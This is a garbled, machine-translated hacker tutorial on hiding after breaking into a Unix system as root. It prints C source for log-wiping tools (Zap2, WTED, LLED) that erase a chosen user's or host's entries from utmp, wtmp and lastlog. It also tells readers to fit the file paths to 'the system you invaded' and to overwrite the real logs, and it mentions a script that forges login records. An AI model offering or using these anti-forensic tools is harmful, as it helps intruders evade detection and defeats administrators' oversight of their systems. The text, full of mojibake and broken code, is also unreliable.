How to hide yourself after entering the system
Zap2 (Clear WTMP / LastLog / UTMP Record) There are many different log clearance on the network, where the best is Zap2. After I compile it to Z2, run Z2 this program immediately after you get root. This program is executed very quickly. You can use finger @ host.xxx to see the current 有 锹 邢 邢 鄄 鄄 聄 聄 or admin's iDLE Time (free time) to guess whether they leave the host. Login,? Ú ???? oóá ¢? 'Ê? È? Wà'2é?' Idle Timeoí ??? úó ????? á ?? £ ???? ó? "W" 2é? '?? í3oí ?? ê? è? ê1 × ?? o3é? Aroot ??? Üá? ê? 2 ?? uí? ê ± ?? DD ??? £ ò ????????? á? root ?? · ?? êè ¨ £? Á ¢? 'Ê? È? ./Z2 ?????? ?? í3? Ù ???? ó ?? § ??? £ now you are much safe than just. Now use the "W" or "who" command to see it, you have been quietly recorded. If you want to use FTP or some of the commands you might use to use two other programs WTED and LLEDs provided in this chapter. Let's complete the Z2 program. You must understand the location of each file in the system you invaded to modify z2.c, which contains the correct path of these files. Below is the part you need to modify in the file header. #define wtmp_name "/ usr / adm / wtmp" #define utmp_name "/ etc / utmp" #define lastlog_name "/ usr / adm / lastlog" should be: #define wtmp_name "/ var / adm / wtmp" in some systems Define utmp_name "/ var / adm / utmp" #define lastlog_name "/ var / adm / lastlog", but you should check what these files are stored in the system you want to invade. The / var / log directory is also a very likely a path. After modifying the correct file path, compile this file. Now you run Z2 after logging in, you have been safe. Here is C procedures: z2.c ------------------------- Cut here #include
#include
#include
#include
#include
#include
#include
#include
#define wtmp_name "/ usr / adm / wtmp"
#define utmp_name "/ etc / utmp"
#define lastlog_name "/ usr / adm / lastlog"
INT F;
Void Kill_UTMP (WHO)
CHAR * WHO;
{
Struct utmp utmp_ent;
IF ((f = open (uTMP_NAME, O_RDWR))> = 0) {
While (READ (F, & UTMP_ENT, SIZEOF (UTMP_ENT))> 0)
IF (! Strncmp (UTMP_ENT.UT_NAME, WHO, STRLEN (WHO))) {
Bzero ((char *) & utmp_ent, sizeof (utmp_ent));
Lseek (f, - (SIZEOF (UTMP_ENT)), seek_cur);
Write (f, & utmp_ent, sizeof (utsp_ent));
}
Close (f);
}
}
Void Kill_WTMP (WHO)
CHAR * WHO;
{
Struct utmp utmp_ent;
Long Pos;
POS = 1L;
IF ((f = open (wtmp_name, o_rdwr))> = 0) {
While (POS! = -1L) {
Lseek (F, - (long) ((Struct UTMP) * POS), L_XTND);
IF (READ (F, & UTMP_ENT, SIZEOF (STRUCT UTMP)) <0) {
POS = -1L;
} Else {
IF (! Strncmp (UTMP_ENT.UT_NAME, WHO, STRLEN (WHO))) {
Bzero ((char *) & utMP_ent, sizeof (struct utmp));
Lseek (F, - ((SIZEOF (Struct UTMP)) * POS), L_XTND);
Write (f, & utmp_ent, sizeof (utsp_ent));
POS = -1L;
Else POS = 1L;
}
}
Close (f);
}
}
Void Kill_Lastlog (WHO)
CHAR * WHO;
{
Struct Passwd * PWD;
Struct LastLog Newll;
IF ((PWD = getPwnam (WHO))! = null) {
IF ((f = open (lastlog_name, o_rdwr))> = 0) {
Lseek PWD-> PW_UID * SIZEOF (STRUCT LastLog), 0);
Bzero ((char *) & newll, sizeof (new);
Write (f, (char *) & newll, sizeof (new);
Close (f);
}
} Else Printf ("% s:? / N", who);
}
Main (Argc, Argv)
Int argc;
Char * argv [];
{
IF (argc == 2) {
Kill_lastlog (Argv [1]);
KILL_WTMP (Argv [1]);
Kill_UTMP (Argv [1]);
Printf ("Zap2! / N");
Else
Printf ("Error./N");
}
--------------------------- Cut Here
-------------------------------------------------- ------------------------------
Other script programs
We start another part of this chapter. We assume that you log in and execute Z2, you need to make FTP to catch a file (remember, like the first
The chapter said, don't ftp or Telent out of this invading host). Ok, your FTP enters the system to grab a few files, or log in to the system.
Other accounts, now you have to use the WTED program. The WTED program allows you to edit the TMP log to clear the record left by your FTP.
You may also use the LLED (editing ASTLOG log).
When you modify the path of the log and compile the WTED program, enter ./wted will appear the following menu.
[8:25 pm] [/ home / compile] WTED
USAGE: WTED -H -F File -A -Z -B -X -U User -n User -e User -c Host
-h this help help
-f Use file instead of default non-default files
-A Show All Entries Found Shows All Records
-u Show All Entries for User Display all records of User-B Show Null Entries Show empty records
-e Erase User Completely completely clears the record of a user
-c Erase All Connections Containing Host Clears all records from a host
-z show zap'd entries ?? ê? ó? zap '| àí1y ??????
-X Attempt to remove Zap'd Entries Completely é? 3yó? zap '| àí1y ??????
If your FTP is named TSMith, you should use WTED -X-E TSMITH.
This program will display a time for user TSMith and ask if you want to delete it. Remember after you delete your login record
CHMOD 644 wtmp.tmp file then copy it to the log file directory and override Yue Chun Nai's raised 笳庋 笳庋?
CHMOD 644 WTMP.TMP
2. CP WTMP.TMP / VAR / ADM / WTMP
Here is the WTED program:
Important: Remember to change the document in these files into the correct path.
WTED.C
---------------------- Cut here
#include
#include
#include
#include
Char * file = "/ var / adm / wtmp";
Main (Argc, Argv)
Int argc;
Char * argv [];
{
INT I;
IF (argc == 1) usage ();
For (i = 1; i
{
IF (Argv [I] [0] == '-')
{
Switch (Argv [I] [1])
{
Case 'B': Printents (""); Break;
Case 'Z': Printents ("Z4P"); BREAK;
Case 'E': ERASE (Argv [i 1], 0); Break;
Case 'C': ERASE (0, Argv [i 1]); Break;
Case 'f': file = argv [i 1]; Break;
Case 'u': Printents (Argv [i 1]); Break;
Case 'A': Printents ("*"); Break;
Case 'x': Remnull (Argv [i 1]); Break;
DEFAULT: USAGE ();
}
}
}
}
Printents (name)
Char * name;
{
Struct UTMP UTMP, * PTR;
INT fp = -1;
PTR = & UTMP;
IF (fp = open (file, o_rdonly))
{
While (READ (FP, & UTMP, SIZEOF (STRUCT UTMP)) == SIZEOF (Struct UTMP))
{
IF (! (Name, Ptr-> UT_NAME)) || (Name == "*") ||
(! ("Z4P", Name) && (Ptr-> UT_TIME == 0))))))))
PrintInfo (PTR);
}
Close (FP);
}
}
PrintInfo (PTR)
Struct UTMP * PTR;
{
CHAR TMPSTR [256];
Printf ("% s / t", ptr-> ut_name); Printf ("% s / t", ptr-> ut_line);
STRCPY (Tmpstr, CTIME (& (PTR-> UT_TIME)));
Tmpstr [strulln (tmpstr) -1] = '/ 0';
Printf ("% S / T", TMPSTR);
Printf ("% S / N", PTR-> UT_HOST);
}
Erase (Name, Host)
Char * name, * host;
{
INT fp = -1, fd = -1, TOT = 0, CNT = 0, n = 0;
Struct UTMP UTMP;
UNSIGNED CHAR C;
IF (fp = open (file, o_rdonly) {
FD = Open ("wtmp.tmp", o_wronly | o_creat);
While (READ (FP, & UTMP, SIZEOF (STRUCT UTMP)) == SIZEOF (Struct UTMP)) {
IF (Host)
IF (strstr (utmp.ut_host, host) Tot ;
Else {CNT ; Write (FD, & UTMP, SIZEOF (Struct UTMP);
IF (name) {
IF (strcmp.ut_name, name) {CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT UTMP);}
Else {
IF (n> 0) {
N -; CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT UTMP);}
Else
{
PrintInfo (& UTMP);
Printf ("ERASE Entry (Y / N / F (ASTFORWARD))?")
C = 'a';
While (c! = 'y' && c! = 'n' && c! = 'f') c = getc (stdin);
IF (c == 'f') {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT UTMP);
PRINTF ("Fast Forward How Many Entries;
Scanf ("% D", & n);
IF (c == 'n') {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT UTMP);
}
IF (c == 'y') TOT ;
}
}
}
Close (FP);
Close (FD);
}
Printf ("Entries Stored:% D Entries Removed:% D / N", CNT, TOT);
Printf ("now chmod wtmp.tmp and copy over the originAl% s / n", file);
}
Remnull (Name)
Char * name;
{
INT fp = -1, fd = -1, TOT = 0, CNT = 0, n = 0;
Struct UTMP UTMP;
IF (fp = open (file, o_rdonly) {
FD = Open ("wtmp.tmp", o_wronly | o_creat);
While (READ (FP, & UTMP, SIZEOF (STRUCT UTMP)) == sizeof (struct utmp)) {if (uts.ut_time) {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT UTMP);
}
Else
Tot ;
}
Close (FP);
Close (FD);
}
Printf ("Entries Stored:% D Entries Removed:% D / N", CNT, TOT);
Printf ("now chmod wtmp.tmp and copy over the originAl% s / n", file);
}
USAGE ()
{
Printf ("USAGE: WTED -H -F file -a -z -b-x -u user -n user -e user -c host / n");
Printf ("/ T-H / TTHIS HELP / N);
Printf ("/ t-f / tuse file instead of default / n");
Printf ("/ t-a / tshow all entries found / n");
Printf ("/ T-U / TSHOW All Entries for User / N");
Printf ("/ T-B / TSHOW NULL ENTRIES / N");
Printf ("/ T-E / TERASE USER COMPLETELY / N");
Printf ("/ T-C / Terase All Connections Contain Host / N");
Printf ("/ t-z / tshow zap'd entries / n");
Printf ("/ T-X / Tattempt to Remove Zap'd Entries Completely / N");
}
---------------------- Cut here
You may also need to clear the / VAT / ADM / LastLog log.
This is used to use the LLLD.C program. Compile this file and name LLED.
You will have the following menu when you run the LLED program:
[4:04 AM] [/ home / paris / compile] LLLED
USAGE: LLED -H -F File -A -Z -B -X -U User -n User -e User -c Host
-h this help ° ?? ú
-f use file instead of default ê1ó ???? ¨ ????? t'úì? è ± ê ???
-a show all entries found ?? ê? è? 2 ?????
-u show all entries for user ?? ê ???? ¨ ó ?? § ?? è? 2 ?????
-b show null entries ?? ê ???????
-e Erase user complely è? 2? é? 3y ??? ¨ó ?? § ??????
-c Erase All Connections Contain Host é? 3y ° üo ???? ¨? ÷? ú ?? è? 2 ?????
-z show zap'd entries ?? ê? ó? zap '| àí1y ??????
-X Attempt to remove Zap'd Entries Completely é? 3yó? zap '| àí1y ??????
You can use -u to look at it, many times your username is not recorded, but you will record your host, usually you can
Sample use: (Suppose I used the host used when I entered the system) Machine.edit.com)
Lled -e username -c machine.EDIT If you want to see if your host is logged in the end of the LastLog log, you should enter: LLED -A
Use ChMod to change the lastlog.tmp file attribute to 644 and copy it to the log file like you use the WTED program above.
Record and cover Yue Gong Neglon?
Important: Set the LastLog path to the correct path in the host you invaded.
Here is LLED.C:
-------------------------- Cut Here
#include
#include
#include
#include
Char * file = "/ var / adm / lastlog";
Main (Argc, Argv)
Int argc;
Char * argv [];
{
INT I;
IF (argc == 1) usage ();
For (i = 1; i
{
IF (Argv [I] [0] == '-')
{
Switch (Argv [I] [1])
{
Case 'B': Printents (""); Break;
Case 'Z': Printents ("Z4P"); BREAK;
Case 'E': ERASE (Argv [i 1]); Break;
Case 'C': ERASE (0, Argv [i 1]); Break;
Case 'f': file = argv [i 1]; Break;
Case 'u': Printents (Argv [i 1]); Break;
Case 'A': Printents ("*"); Break;
Case 'x': Remnull (Argv [i 1]); Break;
DEFAULT: USAGE ();
}
}
}
}
Printents (name)
Char * name;
{
Struct LastLog UTMP, * PTR;
INT fp = -1;
PTR = & UTMP;
IF (fp = open (file, o_rdonly))
{
While (READ (FP, & UTMP, SIZEOF (STRUCT LastLog) == SIZEOF (Struct LastLog))
{
IF (! (Name, Ptr-> LL_LINE)) || (Name == "*") ||
(! ("Z4P", "Z4P", Name) && (Ptr-> LL_TIME == 0)))))))
PrintInfo (PTR);
}
Close (FP);
}
}
PrintInfo (PTR)
Struct lastlog * PTR;
{
CHAR TMPSTR [256];
Printf ("% s / t", ptr-> ll_line);
STRCPY (Tmpstr, CTIME (& (PTR-> LL_Time)));
Tmpstr [strulln (tmpstr) -1] = '/ 0';
Printf ("% S / T", TMPSTR);
Printf ("% S / N", PTR-> LL_HOST);
}
Erase (Name, Host)
Char * name, * host;
{
INT fp = -1, fd = -1, TOT = 0, CNT = 0, n = 0;
Struct LastLog UTMP;
UNSIGNED CHAR C;
IF (fp = open (file, o_rdonly) {fd = open ("LastLog.TMP", O_Wronly | O_CREAT);
While (READ (FP, & UTMP, SIZEOF (STRUCT LastLog) == SIZEOF (Struct LastLog) {
IF (Host)
IF (strstr (utmp.ll_host, host) Tot ;
Else {CNT ; Write (FD, & UTMP, SIZEOF (STRUCT LastLog);}
IF (name) {
IF (strcmp.ll_line, name) {CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT LastLog);
Else {
IF (n> 0) {
N -; CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT LastLog);
Else
{
PrintInfo (& UTMP);
Printf ("ERASE Entry (Y / N / F (ASTFORWARD))?")
C = 'a';
While (c! = 'y' && c! = 'n' && c! = 'f') c = getc (stdin);
IF (c == 'f') {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT LastLog);
PRINTF ("Fast Forward How Many Entries;
Scanf ("% D", & n);
IF (c == 'n') {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT LastLog);
}
IF (c == 'y') TOT ;
}
}
}
Close (FP);
Close (FD);
}
Printf ("Entries Stored:% D Entries Removed:% D / N", CNT, TOT);
Printf ("Now Chmod Lastlog.tmp and Copy Over the Original% S / N", File);
}
Remnull (Name)
Char * name;
{
INT fp = -1, fd = -1, TOT = 0, CNT = 0, n = 0;
Struct LastLog UTMP;
IF (fp = open (file, o_rdonly) {
FD = Open ("LastLog.TMP", O_Wronly | O_CREAT);
While (READ (FP, & UTMP, SIZEOF (STRUCT LastLog) == SIZEOF (Struct LastLog) {
IF (utmp.ll_time) {
CNT ;
Write (FD, & UTMP, SIZEOF (STRUCT LastLog);
}
Else
Tot ;
}
Close (FP);
Close (FD);
}
Printf ("Entries Stored:% D Entries Removed:% D / N", CNT, TOT);
Printf ("now chmod lastlog.tmp and copy over the originAl% s / n", file);
USAGE ()
{
Printf ("USAGE: LLED -H -F File -a -z -B -X -U User -n User-E User -c Host / N");
Printf ("/ T-H / TTHIS HELP / N);
Printf ("/ t-f / tuse file instead of default / n");
Printf ("/ t-a / tshow all entries found / n");
Printf ("/ T-U / TSHOW All Entries for User / N");
Printf ("/ T-B / TSHOW NULL ENTRIES / N");
Printf ("/ T-E / TERASE USER COMPLETELY / N");
Printf ("/ T-C / Terase All Connections Contain Host / N");
Printf ("/ t-z / tshow zap'd entries / n");
Printf ("/ T-X / Tattempt to Remove Zap'd Entries Completely / N");
}
-------------------------------------------------- -------------- Cut Here
Here is a good Perl script that edits TMP, WTMP, and check processes. This program also allows you to add a line in the WTMP log.
If you want to do it, you can join CLINTON. Whitehouse House .Gov logging Into port ttyp3 and display
He stayed in the system for a few hours!
Using the check function, you can know if anyone is logged in to the system and there is no record in the UTMP log. System administrator sometimes
After the record, I like to hide myself, this program can see if they are online. You must have root permissions to perform this program, this
A program also requires a version of 5.003 or more to run. Enter Help after starting this scriptor.
Here are some basic commands:
STARTS by loading wtmp
Delete Username
Delete Host Hostanme
Write
Read WTMP
Delete Username
Delete Host Hostname
Write
Use Help to view other commands ... this is the best WTMP, WTMP editing?
Say thank you;)
